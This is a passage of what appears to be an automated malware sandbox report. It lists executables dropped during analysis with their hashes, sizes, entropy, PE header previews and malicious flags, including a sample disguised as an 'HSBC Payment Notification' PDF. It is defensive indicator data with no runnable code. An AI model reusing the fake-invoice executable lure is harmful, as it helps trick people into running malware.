                                                                                                                                                                              MD5:628FE1B14F9DF3601C27E15923167F59
                                                                                                                                                                              SHA1:536472243CA58F3DD03C5A5972E1B26FAB9CBC3D
                                                                                                                                                                              SHA-256:51D687C2770180D3A070CDBB66203D274D516DB54ABBA9CBDEC5D2BA21092840
                                                                                                                                                                              SHA-512:0E5EF0BAE63185EB270A8CF6D82B00720DDB4EFACB582D3D963DBAA58AD6C5035C73C0FCEC228570E89927F62628F11DF166DB3DD3680E142FD3B8AEF3251B6D
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................b....6......6......6.....6.....................M..4......4......4........f....4.....Rich...........................PE..L.....{d.................&...`...............@....@.......................... ..............................................r..,................................... O..p....................P.......O..@............@..4............................text....%.......&.................. ..`.rdata...@...@...B...*..............@..@.data................l..............@....rsrc................p..............@..@.reloc...p...........v..............@...................................................................................................................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1540608
                                                                                                                                                                              Entropy (8bit):4.935000317982403
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:+xwSJzkrmZsY/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:+yIkrKsYLNiXicJFFRGNzj3
                                                                                                                                                                              MD5:45A3CF375495AE709AE2C88E93164CA0
                                                                                                                                                                              SHA1:F982E64250667C882513477E7C8DD47A4E07BB8F
                                                                                                                                                                              SHA-256:D135AA35AC5D893E6E84813C078D92B105B0384641D91F18AC0B2FDB6F90946D
                                                                                                                                                                              SHA-512:101AFBBA0A01CE2B8089C9DB449C7899D81655B6C1DE7B7C74816A18EB6500C359F1DB1F4F846592B8029FCAD45BD87531F58193127F568EBD8CA324D4892021
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................y...5.......5.....5......7.......................7.....7.Z....2...7.....Rich..........................PE..d.....{d.........."..........<.......&.........@.............................."........... .................................................`...x.... ..............................`j..p....................l..(....j..8............................................text...l........................... ..`.rdata..............................@..@.data...4#..........................@....pdata........... ..................@..@_RDATA..............................@..@.rsrc........ ......................@..@.reloc...`...0......................@...................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1804800
                                                                                                                                                                              Entropy (8bit):5.2474719363604025
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:UHQJLIRZvsnNN/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:UHQJLy4NLNiXicJFFRGNzj3
                                                                                                                                                                              MD5:3FB0F1E8352F5B4BE3480BB7977D82C6
                                                                                                                                                                              SHA1:24EF6E6CF7276B529EF3451DEE3B377E7D66772F
                                                                                                                                                                              SHA-256:BD604688E312CEAC7DBB73EAC0E1810FE2D33EB577C2DF2EA0AEF3860E1BC432
                                                                                                                                                                              SHA-512:4794C956AEC672618DDE50DF9D5C99600D6C72C50BE08116053C0BB6CFCC6B8F46E3E27C9DBAB78C1A9BE7662B1062BF5417650735A442BABCB92D54AD0263C5
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........L<."o."o."o...o.."o+.&n.."o+.!n.."o+.#n."o+.'n."o..$n."o..#n.."o).+n.."o.#o;."o).'n."o)..o."o). n."oRich."o........PE..d......d.........."......\.....................@..............................&......_.... .................................................."..@....0...........W..................x...T.......................(...`...8............p..........`....................text....[.......\.................. ..`.rdata.......p.......`..............@..@.data....^...P...R...2..............@....pdata...W.......X..................@..@.didat..8...........................@....msvcjmc..... ......................@....rsrc........0......................@..@.reloc...`...@......................@...................................................................................................................................................................
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):5365760
                                                                                                                                                                              Entropy (8bit):6.447931608305787
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:49152:aUZujDjDjDjXmXgoz2PsapFQr97dRpqbeE8U2Izwot+bdro4O8b8ITDnlggyJ1kF:1WmXL6DE97dRpKuoQbgu7wRGpj3
                                                                                                                                                                              MD5:D732808B62774CB29FC81935B01222EB
                                                                                                                                                                              SHA1:559E911B3D0CADF93725E8FE3D2D1C6735FCFCD0
                                                                                                                                                                              SHA-256:DD1DCA03F9B7B1CB0116D85CCED9D1838522349001812D3EA1933B9D792E3009
                                                                                                                                                                              SHA-512:584D48910AB48A82AFC470C5FD6F6B1B6797B7448212BC204BD17A53145E91AE0AA4D67D02465C73268AADB10EB049C694419E9E9A1F6A0DD0D4C4211222E58A
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........I.~.(g-.(g-.(g-.Cd,.(g-.Cb,i(g-.G.-.(g-b\c,.(g-b\d,.(g-.t.-.(g-.(g-C(g-b\b,.(g-.Cc,.(g-.Ca,.(g-.Cf,.(g-.(f-.+g-`\b,.(g-`\g,.(g-`\.-.(g-.(.-.(g-`\e,.(g-Rich.(g-........PE..L......d.........."......./..p......P"%.......0...@...........................R.......R..............................@:......@:.......;..V...........................^6.T...................._6.....h.5.@.............0...... :.`....................text...*./......./................. ..`.rdata..Ze....0..f....0.............@..@.data....E....:......h:.............@....didat........;......B;.............@....rsrc....V....;..X...H;.............@..@.reloc...P...@G..@....F.............@...........................................................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):3163136
                                                                                                                                                                              Entropy (8bit):7.971281628653374
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:98304:HrZ23AbsK6Ro022JjL2WEiVqJZh7wRGpj3:LJADmmxL2WEoCZlF9
                                                                                                                                                                              MD5:C92A6DE5448DB51CC32A72C8CA9326BE
                                                                                                                                                                              SHA1:4AC3256BDFAB540B0657A6635C9962C2F2E7BF3F
                                                                                                                                                                              SHA-256:E1C0278E3AF4FF09E6080515AFBAE2F6AEA4F00B3E795152D5333ED1EC732DD1
                                                                                                                                                                              SHA-512:0553D127F9B1AF315CE8CCC7EB4CAC7CFC3642A0A1B33FBDB6C14A324CB9F2FBC695CF7C9D7FB2C087BF28B117C03C5D2FB32D86FF4A09EEB2367240F8F8F203
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5{.!q..rq..rq..rq..r...rQc.r`..rQc.r`..rQc.rp..rQc.rp..rRichq..r........................PE..L.....A.................~... .......^... ........... ........................1.......0.......... .....................................0............................!............................................... ...............................text....|... ...~.................. ..`.data...............................@....rsrc...../......./.................@...................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1213440
                                                                                                                                                                              Entropy (8bit):7.194646283316611
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:nfrYY42wd7hlOE9fpkEE64I/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:+/9xrSILNiXicJFFRGNzj3
                                                                                                                                                                              MD5:E2834CA78521A7A29314A87E0CFD2346
                                                                                                                                                                              SHA1:D157F71A9EE726BD094EF372FB1AA959823891F6
                                                                                                                                                                              SHA-256:A78E529054F889A3883B77DD8DD5392A2A0A6C68BD3EAD49BD520BBBD8946DDD
                                                                                                                                                                              SHA-512:1265DD968D5FC06D949D84EAC8280AC609AC08DBE592C30202A37A51463C4993EC6018E9F7CF417531198166007916D603D59B767AE7999D9B8F0ACAD583EA4E
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......@......T...T...T...U...T...U...T..U...T..U...T...U...T..U...T...U...T...Tf..T..U...T..T...T..uT...T..U...TRich...T................PE..d.....{d..........#......J...........3.........@............................. ........... ..................................................L.......`..........(J..................p...T.......................(... B..8............`.......I..`....................text....H.......J.................. ..`.rdata..d....`.......N..............@..@.data...(w...p...&...^..............@....pdata..(J.......L..................@..@.didat.......@......................@..._RDATA.......P......................@..@.rsrc........`......................@...................................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1544192
                                                                                                                                                                              Entropy (8bit):4.836095188616976
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:vzNKU/53/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:vzNr/53LNiXicJFFRGNzj3
                                                                                                                                                                              MD5:275F68B3B78D5000BECB81AB9E961D06
                                                                                                                                                                              SHA1:B199829A3BEA42D000FA945A6804206A1B7C3235
                                                                                                                                                                              SHA-256:D32C9C9DD66E4A85F0C3118743C90A3BF05CD7679AB8FCCD1DFF97A63C9590F6
                                                                                                                                                                              SHA-512:877B900F9BBD533AA60FF51707EDB49A7D1E64CC1513A802935831E581D592B5CEFE3B3ADE378EDBE5C28C2A0ACE8ED6F006D76AB536AAA7C6ECF53A24C097B8
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........E@..$...$...$...\...$...V*..$...V-..$...V+..$...V/..$...$/.0 ...V&..$...V..$...V..$...V,..$..Rich.$..........PE..d...!!.R.........."......`..........0C.........@.............................`"......0.... .......... ......................................Xl..........X.......d.......................T...................8...(.......8...........`...`............................text...(X.......`.................. ..`.rdata..z....p... ...p..............@..@.data...............................@....pdata..d........ ..................@..@.rsrc...X...........................@..@.reloc..............................@...................................................................................................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):5855744
                                                                                                                                                                              Entropy (8bit):6.572130941377291
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:98304:vALuzDKnxCp3JKCrPJzruaI6HMaJTtGby7wRGpj3:4aGg3cuPIaI6HMaJTtGb2F9
                                                                                                                                                                              MD5:0BB3C93494CF0D972865D0A323A6A957
                                                                                                                                                                              SHA1:952538C6820F43EE3B9123A892F1B278B698D42B
                                                                                                                                                                              SHA-256:530BB34F5EBBE09B809545F63745346AD6BE19C0EDCC49CC8608814E0817AE3A
                                                                                                                                                                              SHA-512:3CF02B38E148535D3DF608F290B225EEC221996B00774180247534166091F2A03B8AE20A7A5BB6ED065A6194712BB6CE19D93798DFE1188E3B3AB15578D76004
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......Jc.M.............p......nx......nx......).......)........p.......p.......p..&....p..............nx..i...kx......kx......kx..g...kxx.............kx......Rich....................PE..d....".e..........".... .z6..........32........@..............................Y.....{.Y... .................................................8.B.......K..a...PI..%..................0.B.8...................X.B.(.....7.@.............6.0.....B......................text....y6......z6................. ..`.rdata..5.....6......~6.............@..@.data...`....0G.......G.............@....pdata...%...PI..&...:I.............@..@.didat.. .....K......`K.............@..._RDATA..\.....K......fK.............@..@.rsrc....a....K..b...hK.............@..@.reloc........P.......O.............@...................................................................................................................
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1468416
                                                                                                                                                                              Entropy (8bit):4.89007921484243
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:fXr/SVAxW8/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:DNxhLNiXicJFFRGNzj3
                                                                                                                                                                              MD5:7C20F540564A8667850415588B5D432A
                                                                                                                                                                              SHA1:5C3C1F96DE284BE43B698241388C374D70554231
                                                                                                                                                                              SHA-256:1AF59598385EAC6A9CF720BF1DAD02B50F3933389CB1E631263C0C63A60EE0FD
                                                                                                                                                                              SHA-512:16779F5A8D736FA9FFBB296694D2C1EAB3A785F254AF1E9A58E74E7606B9DB70CA9D1FA6128669B15C7F55874F648D0FC11616049FA729B790E2BE44F8F493FF
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........K.k...k...k.......k.......k.......k.......k...k..Ro.......k....l..k.......k....n..k.......k..Rich.k..........PE..L...9.A/.....................T......@V............@..........................`!.................. ......................................8............................_..T...............................@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...8...........................@..@.reloc..............................@...........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):27533312
                                                                                                                                                                              Entropy (8bit):6.24804678699589
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:196608:ChRrmpGpGdJM7Hbp8JfrCGvqTYuNDmoefAlprtPz25HqaI6HMaJTtGbQOyF9:ChRCpGpMJMrbp8JjpWdNlc5p9
                                                                                                                                                                              MD5:1194AA497581AF9F222AE2AD04B43218
                                                                                                                                                                              SHA1:B5715AE58FA2FEED267E232D608C0F84EE2341DB
                                                                                                                                                                              SHA-256:2BA67E9AC638FFAD09E04B860E2EA27A3060522BFA62A77BF94A7BE6F1A35FBE
                                                                                                                                                                              SHA-512:343950D2EFD4AF79A1605F2D2BC75A987BB76E095F1A430A378FBB61C3F45B6A7C12DDF2DAE3E1575E3E61AB4A98AD1B420F9921A601008A53865C448CC9A1F2
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...................................H...........!..L.!This program cannot be run in DOS mode....$.......$.|+`{.x`{.x`{.xi..xv{.x...yf{.x...yj{.x...yd{.x...yO{.xG..xh{.xG.oxa{.x...yb{.x...ya{.x...ya{.x...yd{.x...yc{.x...y~{.x...y}{.x`{.xTs.x...ya{.x...yjz.x...y v.x...xa{.x`{.xa{.x...ya{.xRich`{.x........PE..d......e..........".... .....H.................@.......................................... ..................................................u..D.... ?...X...7.........................8....................U..(...`...@............0.. "..l .......................text............................... ..`.rdata..S.~..0....~.................@..@.data.........1.......0.............@....pdata........7.......7.............@..@.didat..`.....>.......>.............@....detourc.!....>.."....>.............@..@.rsrc.....X.. ?...X...>.............@..@.reloc..............................@...........................................................................................
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):2199552
                                                                                                                                                                              Entropy (8bit):6.782210710834106
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:49152:583pZ3kd0CuEeN0LUmRXbYs65m2LNiXicJFFRGNzj3:xKuUMY15d7wRGpj3
                                                                                                                                                                              MD5:31048E860DC4158496ACAB09EF1923D1
                                                                                                                                                                              SHA1:386E1FBDEC83E01ED966994ADB0B52654B93CF74
                                                                                                                                                                              SHA-256:5DFFDE9740C8992ABA13A58B1B910018B7EC05BFC5E917150CD1C52A9637EF89
                                                                                                                                                                              SHA-512:C7E71F36D85A9FC204284F5D685F9C57CDAA2AEE456C8F6495A73CD5301F3EBF3A9F2617D3BE04B3C740D165AFBB11E5841EF99441BAF19B0D5A351A00502407
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D................7......................!..............~............Y.......[............Rich............PE..d...rq............"..................$.........@..............................!.....jB"... .......... ......................................P...|....p... ......L....................a..T...................Xt..(... s..8............t...............................text...6........................... ..`.rdata..............................@..@.data...@...........................@....pdata..L...........................@..@.rsrc.... ...p...0...P..............@..@.reloc... ..........................@...................................................................................................................................................................................................................................................................
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):4971008
                                                                                                                                                                              Entropy (8bit):6.668191967559824
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:49152:dErw1zDb1mZtOoGpDYdSTtWXy4eqH8nYAmoBvYQugWupoI6bAGO8ndOPcptz6+MQ:LA4oGlcR+glpdOPKzgVZc7wRGpj3
                                                                                                                                                                              MD5:0CD489792626C63DAC9215CD3E01CD00
                                                                                                                                                                              SHA1:8C563F3FEFCC4743F49E06F57D4DE34A6E48946B
                                                                                                                                                                              SHA-256:48F6E11F22A63F7D9467402EA9E7B167622CC2B44A2B70D2D1EDE622433504F2
                                                                                                                                                                              SHA-512:930ECEFCFE2C6421DE4EA16DDB82356E9A954C3E495104544A3E8A1C031B5ACD4AEC825D04AB88DF239E240407D909AEFA10202AD77D1C2CC9E04B7F444A6454
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......Eh.<..{o..{o..{o.q.o..{oaszn..{oas~n*.{oas.n..{oasxn..{o.{}n..{o.{xn..{o.{.n..{o.{zn..{o..zo..{odsxn..{ods~n..{odsrnF.{ods.o..{o...o..{odsyn..{oRich..{o........PE..d...0m.d..........".... ..-.........0p+........@..............................L......jL... .................................................HZ:.......B.......@.<C....................:.8...................p.9.(... P..@.............-......H:.@....................text...[.-.......-................. ..`.rdata..9.....-.......-.............@..@.data...x....`>......>>.............@....pdata..<C....@..D....@.............@..@.didat..`.....B......LB.............@....rsrc.........B......PB.............@..@.reloc........B......ZB.............@...........................................................................................................................................................................
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):4897792
                                                                                                                                                                              Entropy (8bit):6.827342709053817
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:49152:Z8ErxqTGsitHloGgkiDrCvJVZfEcpwD0YLgVCM2hnwLNwiHaGI3Y/685ZYMaWgKj:0v2gM+qwtLg7pPgw/DSZHG7wRGpj3
                                                                                                                                                                              MD5:C578CCC487248169B2D039EFEFCD029B
                                                                                                                                                                              SHA1:2EE92BA18666FCF9F811E4270F509811C4D3072E
                                                                                                                                                                              SHA-256:9C923107DE513269387D49761DB8812534FC4AB7DDFDB7CC4A3796B01906E796
                                                                                                                                                                              SHA-512:4373C90CC917D87CD40724988F4A6C92AD453E98D10E3AB1C02539259FC8260E3AEC0B13ACD5D8B69520D2DBE5F58B64548B650D8F24D41499C3BD31E6CAB789
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e.........."......D/......... ..........@..............................L.......K... ...........................................6.N.....6.......<......P:.l.....................6......................6.(...`s/.@.............6.8.....6.@....................text....C/......D/................. ..`.rdata......`/......H/.............@..@.data...4:....8.......7.............@....pdata..l....P:.......9.............@..@.00cfg..0.....;.......:.............@..@.gxfg....1....;..2....:.............@..@.retplne.....0<.......:..................tls....A....@<.......:.............@...CPADinfo8....P<.......:.............@...LZMADEC......`<.......:............. ..`_RDATA..\.....<.......:.............@..@malloc_h......<.......:............. ..`.rsrc.........<.......:.............@..@.reloc... ...`C.......A.............@...........................................................
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):4897792
                                                                                                                                                                              Entropy (8bit):6.827342866276559
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:49152:b8ErxqTGsitHloGgkiDrCvJVZfEcpwD0YLgVCM2hnwLNwiHaGI3Y/685ZYMaWgKj:av2gM+qwtLg7pPgw/DSZHG7wRGpj3
                                                                                                                                                                              MD5:05BE3F60C2A1C15C0C002768B4247B95
                                                                                                                                                                              SHA1:68C851C4F4B33D806CD36438FAA0BF62C2760948
                                                                                                                                                                              SHA-256:0A7E68FEB06C5DEC2512F74DCF16ECF8C1ACC31EA96B0566AC025F2AA2B78D5E
                                                                                                                                                                              SHA-512:162B27EE0093E08CCAEFBDC2B93D3E76892C04F82E4ADD4077827038018D0D19DEA41576078BC68917997E9450BF79C674F8218B3BE2C6C92BDFA54643A0DFF6
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e.........."......D/......... ..........@..............................L.......K... ...........................................6.N.....6.......<......P:.l.....................6......................6.(...`s/.@.............6.8.....6.@....................text....C/......D/................. ..`.rdata......`/......H/.............@..@.data...4:....8.......7.............@....pdata..l....P:.......9.............@..@.00cfg..0.....;.......:.............@..@.gxfg....1....;..2....:.............@..@.retplne.....0<.......:..................tls....A....@<.......:.............@...CPADinfo8....P<.......:.............@...LZMADEC......`<.......:............. ..`_RDATA..\.....<.......:.............@..@malloc_h......<.......:............. ..`.rsrc.........<.......:.............@..@.reloc... ...`C.......A.............@...........................................................
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):2156544
                                                                                                                                                                              Entropy (8bit):6.9474953057981645
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:FtjqL8fHv8aUbp8D/8+xyWAV/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:HjKKv81FI/8zDLNiXicJFFRGNzj3
                                                                                                                                                                              MD5:511DA813147FD4D5B61029F752DEBFA6
                                                                                                                                                                              SHA1:D5E045F3DA49C97A7185390B2B70BE1334A3B551
                                                                                                                                                                              SHA-256:29AEC565246A0082015A4AC749E246FA795CFA30AD5E202AC8F3A1F180D64351
                                                                                                                                                                              SHA-512:4B4F7DD669822AFFB28860EE224CEAF0B7DB1A0C40C93A6C6D420A231DA1F4846E754CE3EF768B9A47586F1A5CA713AC4F056CDD1544D331788AA2915C5FF404
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e.........."......F.....................@.............................P"......D!... ..........................................X..\...$Y....... ...&......(...................lM......................PL..(...pr..@............_...............................text....D.......F.................. ..`.rdata..$....`.......J..............@..@.data...,.... ......................@....pdata..(...........................@..@.00cfg..0...........................@..@.gxfg....,..........................@..@.retplne.................................tls................................@...LZMADEC............................. ..`_RDATA..\...........................@..@malloc_h............................ ..`.rsrc....&... ...(..................@..@.reloc.......P......................@...................................................................................................
                                                                                                                                                                              Process:C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):2370560
                                                                                                                                                                              Entropy (8bit):7.027348462105408
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:49152:2AMsOu3JfCIGcZuTodRFYKBrFDbWpeLNiXicJFFRGNzj3:2AMa3PZuTS37wRGpj3
                                                                                                                                                                              MD5:67C322900C5D783BD07C9844D6B508F0
                                                                                                                                                                              SHA1:4B92B8F908168FF8C039DB29EF5600AD38EC681A
                                                                                                                                                                              SHA-256:F2E1ED761AFEA50D820364FDC17D4B1ECD222097B572587116622BCD313CD091
                                                                                                                                                                              SHA-512:BD416F3431A2519F848865167777729A52741666E2D8BA3AFE74807B7E8AD75915452F8DDFA8517544A2C96570359F1FCC517F1908B1598DB76D44CA6C6FC1FF
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e..........".................0..........@..............................%.......$... ..........................................}..Z...Z}...............@..`...................$k.......................j..(.......@............... ............................text...V........................... ..`.rdata..Hv.......x..................@..@.data...t....`.......>..............@....pdata..`....@.......6..............@..@.00cfg..0...........................@..@.gxfg....+.......,..................@..@.retplne.....@...........................tls....A....P......................@..._RDATA..\....`....... ..............@..@malloc_h.....p.......".............. ..`.rsrc................$..............@..@.reloc...............<..............@...........................................................................................................................................
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 1984512
Entropy (8bit): 7.098273000165978
Encrypted: false
SSDEEP: 49152:pSK7Fhsly2EPfOGE4LNiXicJFFRGNzj3:YU2cO47wRGpj3
MD5: C99C88D2120E1E9B20A95062A487E70D
SHA1: E3BE527F5DE6C80821E7CEBF6C11F340A2834482
SHA-256: 5C76453B4B50E56BAEDBFF5609CC869F816EBBF3025D78319151EB91BAC39642
SHA-512: E8965D784B834374CF4FE5FDA396BD47D5B883205AEBCD4BEE2DD23110C5B9BFBDCF885E5918EFA4D2C9A4300DCB2E934C75CD8A0BF993D437542C28920EAD88
Malicious: true

Process: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 1779712
Entropy (8bit): 7.151347051638003
Encrypted: false
SSDEEP: 49152:Nv7e0j11mD+/wDGbqLNiXicJFFRGNzj3:BDx1mkq7wRGpj3
MD5: 03D2676A6F61D30E364B35077AC90872
SHA1: 962031BA2E2B83A8DE13C98FD6F1E9D45104BE7D
SHA-256: 5E8B61CB31CF9718F336D06AD202DD009FD422E95517F5C9CAE8974A0DF090F7
SHA-512: E2B3745FB5BD12AB3B722CC3C2A7559E7709685DA5FDC456518CDBD402FE979893A7043553E5E618BED768037B774AD183844ED523F9761F67F8DB71997A7048
Malicious: true

Process: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 1533952
Entropy (8bit): 4.933085425137115
Encrypted: false
SSDEEP: 24576:BKhS2/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:B8LNiXicJFFRGNzj3
MD5: 50675C06B78688820F85A9F584519632
SHA1: FC730A028F089FBE706B47043FA39B5BAD3D1633
SHA-256: 4D2A1C5940071E8CCF502C560B3F50BB98E0BD2BA30DC06655D9A9ADB682D08B
SHA-512: 157B4F90A2E4F31EBCBAE0805B10304530DBD83582C1826F27622BFDFD54454587645C8AA3F38F605231943888E72FBDB84BBE80BAB454BC7FDB62D9620F6140
Malicious: true

Process: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 1286656
Entropy (8bit): 7.213925180585707
Encrypted: false
SSDEEP: 24576:usFfc1VyFnTUQn652bO4HJ/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:usFcInTrJfLNiXicJFFRGNzj3
MD5: 8A4EA576196A6EE617A986831EAEF815
SHA1: F45E5CBA64797E654BDD16451970FBE75EDB8A59
SHA-256: 78C6B8DC90E6171E2C10D2259C7508DC71D55881CB7EE6BCD65178E038A70AC0
SHA-512: 424ECAB9870960C6CD15FFE95D46F9D478F0B778376659A84D1A10405332FB56F3703DF5D118E0A39F470958F41C5D338EFA1E8584478A95FB8A561F6896BF55
Malicious: true

Process: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 1246208
Entropy (8bit): 7.485578003142355
Encrypted: false
SSDEEP: 24576:Vt9j6p4xQbiKI69wpemIwpel9C/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:Vt9+aQbtl2peapelwLNiXicJFFRGNzj3
MD5: C6336676C3E6C992DBAFE0E3ED7DC516
SHA1: 7E528473F7C6C422B23574295D5EC870FCB129AD
SHA-256: D0FE0093386950A96244C15D0B0F566EB4678B35D7AC2A6E6D5573FF0BDDC677
SHA-512: C05776750B1C03974438C25492201E7D50E16239F4CD09158DA42548720E1F98C31D187313F87F79F0A0470B76D42B36724C9974827386617FA85E2E4E39079D
Malicious: true

Process: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
